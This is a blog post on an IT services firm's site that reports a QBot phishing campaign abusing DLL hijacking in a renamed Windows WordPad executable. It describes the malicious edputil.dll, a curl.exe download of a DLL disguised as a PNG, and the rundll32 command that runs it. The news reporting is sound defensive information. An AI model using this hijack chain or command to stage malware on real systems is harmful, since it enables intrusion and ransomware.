(416) 825-2120
info@veiliant.com
Free IT Assessment
  • About
  • Services
    • Fully Managed IT
    • Cloud Services
    • Software Development
    • Business Continuity
    • Cyber Security
    • Professional IT Consulting
  • Our Team
  • Blog
  • Contact
Remote Support

QBot Malware Abuses Windows WordPad EXE to Infect Devices

Posted on 27 May at 8:02 am

The QBot malware operation has started to abuse a DLL hijacking flaw in the Windows 10 WordPad program to infect computers, using the legitimate program to evade detection by security software.

A DLL is a library file containing functions that can be used by more than one program at the same time. When an application is launched, it will attempt to load any required DLLs.

It does this by searching through specific Windows folders for the DLL and, when found, loads it. However, Windows applications will prioritize DLLs in the same folder as the executable, loading them before all others.

DLL hijacking is when a threat actor creates a malicious DLL of the same name as a legitimate one, and places it in the early Windows search path, usually the same folder as the executable. When that executable is launched, it will load the malware DLL rather than the legitimate one and execute any malicious commands within it.

QBot abuses WordPad DLL hijacking flaw

QBot, also known as Qakbot, is a Windows malware that initially started as a banking trojan but evolved into a malware dropper. Ransomware gangs, including Black Basta, Egregor, and Prolock, have partnered with the malware operation to gain initial access to corporate networks to conduct extortion attacks.

Security researcher and Cryptolaemus member ProxyLife told BleepingComputer that a new QBot phishing campaign began abusing a DLL hijacking vulnerability in the Windows 10 WordPad executable, write.exe.

While BleepingComputer has not seen the original phishing emails, ProxyLife told us they contain a link to download a file.

When a person clicks on the link it will download a random named ZIP archive from a remote host will be downloaded.

This ZIP file contains two files: document.exe (the Windows 10 WordPad executable) and a DLL file named edputil.dll (used for the DLL hijack).

Contents of the downloaded ZIP file
Contents of the downloaded ZIP file
Source: BleepingComputer

As you can see from the properties of the document.exe file, it is simply a renamed copy of the legitimate Write.exe executable used to launch the Windows 10 WordPad document editor.

Renamed Windows 10 WordPad executable
Renamed Windows 10 WordPad executable
Source: BleepingComputer

When document.exe is launched, it automatically attempts to load a legitimate DLL file called edputil.dll, which is normally located in the C:\Windows\System32 folder.

However, when the executable attempts to load edputil.dll, it does not check for it in a specific folder and will load any DLL of the same name found in the same folder as the document.exe executable.

This allows the threat actors to perform DLL hijacking by creating a malicious version of the edputil.dll DLL and storing it in the same folder as document.exe so it is loaded instead.

Once the DLL is loaded, ProxyLife told BleepingComputer that the malware uses C:\Windows\system32\curl.exe to download a DLL camouflaged as a PNG file from a remote host.

This PNG file (actually a DLL) is then executed using rundll32.exe with the following command:

rundll32 c:\users\public\default.png,print

QBot will now quietly run in the background, stealing emails for use in further phishing attacks and eventually downloading other payloads, such as Cobalt Strike (a post-exploitation toolkit threat actors use to gain initial access to the infected device).

This device will then be used as a foothold to spread laterally throughout the network, commonly leading to corporate data theft and ransomware attacks.

By installing QBot through a trusted program like the Windows 10 WordPad (write.exe), the threat actors hope security software will not flag the malware as malicious.

However, using curl.exe means that this infection method will only work on Windows 10 and later, as earlier operating system versions do not include the Curl program.

For the most part, this should not be an issue, as older versions of Windows have been phased out after reaching the end of support.

At this time, the QBot operation has moved on to other infection methods in recent weeks, but it is not uncommon for them to switch to previous tactics in later campaigns.

Previous Post
Hackers Target Vulnerable WordPress Elementor Plugin After PoC Released
Next Post
Canadian Nurses Association Hit by Cyber Attack

Recent Posts

  • Google Extends Security Update Support for Chromebooks to 10 Years September 17, 2023
  • MGM Casino’s ESXi Servers Allegedly Encrypted in Ransomware Attack September 16, 2023
  • Caesars Entertainment Confirms Ransom Payment, Customer Data Theft September 15, 2023
  • Fake Cisco Webex Google Ads Abuse Tracking Templates to Push Malware September 14, 2023
  • Microsoft Teams Down: Ongoing Outage Behind Message Failures, Delays September 13, 2023

Categories

  • Cybersecurity (198)
  • Machine Learning (1)
  • News (115)
  • Robotic Process Automation (4)

Partners and Affiliates

Manufacturers matter. We partner with industry leaders that focus on business technology solutions. Let us help you find the right fit for your organization. Our partners offer great support, education, and benefits that we pass down to our clients.

 

About Us

Veiliant Inc. is a Managed Service Provider that offers many flexible services. We strive to meet the growing demand for computer support services needed for business success.

Veiliant has a proactive approach to help create innovative solutions devised  with your business goals in mind.

Our Services

  • Fully Managed IT
  • Cloud Services
  • Software Development
  • Business Continuity
  • Professional IT Consulting
  • Cyber Security

Related Links

  • FAQ
  • Privacy Policy

Contact Information

5155 Spectrum Way, Unit 1, Mississauga, ON, L4W 5A1
(416) 825-2120

Customer Support

  • Remote Support
  • Free IT Assessment

© 2023 Veiliant Inc. All rights reserved.